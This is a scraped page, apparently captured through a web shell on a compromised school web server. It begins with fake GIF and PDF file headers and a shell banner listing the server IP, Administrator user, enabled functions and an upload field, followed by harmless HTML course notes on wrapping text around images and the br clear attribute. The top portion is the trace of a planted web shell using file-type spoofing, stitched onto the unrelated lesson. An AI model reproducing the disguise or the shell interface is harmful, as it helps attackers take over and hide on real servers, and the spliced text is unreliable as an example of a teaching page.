GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch5/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>MMDT1021 Chapter 5 Notes - page 9</title> <link href="chapter5p9_files/style.css" rel="stylesheet" type="text/css"></head><body> <p class="pagetitle" align="center">MMDT1021 Chapter 5 Notes - page 9 </p> <p> </p> <p class="sectiontitle">Wrapping text around images (Alignment)</p> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="85%">Code</th> <th width="15%">Page</th> </tr> <tr> <td width="85%">An example page using all align values.</td> <td width="15%"><a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p9.htm"> Result</a><br> <a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p9.txt">Source</a></td> </tr> </tbody></table> <p> </p> <p class="sectiontitle">Stopping Text Wrap</p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">Without any 'clear' attribute in the <br> tag.</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="50%">Code</th> <th width="50%">Result</th> </tr> <tr valign="top"> <td width="50%"><code><img src="images/world.jpg" border="0" width="137" height="145" alt="Globe image" align="left" /><br> <h1>Big Text</h1><br> <br /><br> This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text.</code></td> <td width="50%"><img src="chapter5p9_files/world.jpg" alt="Globe image" align="left" border="0" height="145" width="137"> <h1>Big Text</h1> <p><br> This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text.</p></td> </tr> </tbody></table> <p> </p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">With a 'clear' attribute in the <br> tag between the <h1> tag and other text.</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="50%">Code</th> <th width="50%">Result</th> </tr> <tr valign="top"> <td width="50%"><code><img src="images/world.jpg" border="0" width="137" height="145" alt="Globe image" align="left" /><br> <h1>Big Text</h1><br> <br clear="all" /><br> This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text.</code></td> <td width="50%"><img src="chapter5p9_files/world.jpg" alt="Globe image" align="left" border="0" height="145" width="137"> <h1>Big Text</h1> <p><br clear="all"> This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text.</p></td> </tr> </tbody></table> <p> </p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">With a 'clear' attribute in the <br> tag before the <h1> tag.</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="50%">Code</th> <th width="50%">Result</th> </tr> <tr valign="top"> <td width="50%"><code><img src="images/world.jpg" border="0" width="137" height="145" alt="Globe image" align="left" /><br> <br clear="all" /><br> <h1>Big Text</h1><br> This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text.</code></td> <td width="50%"><img src="chapter5p9_files/world.jpg" alt="Globe image" align="left" border="0" height="145" width="137"><br clear="all"> <h1>Big Text</h1> <p>This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text. This is some regular text.</p></td> </tr> </tbody></table> </body></html>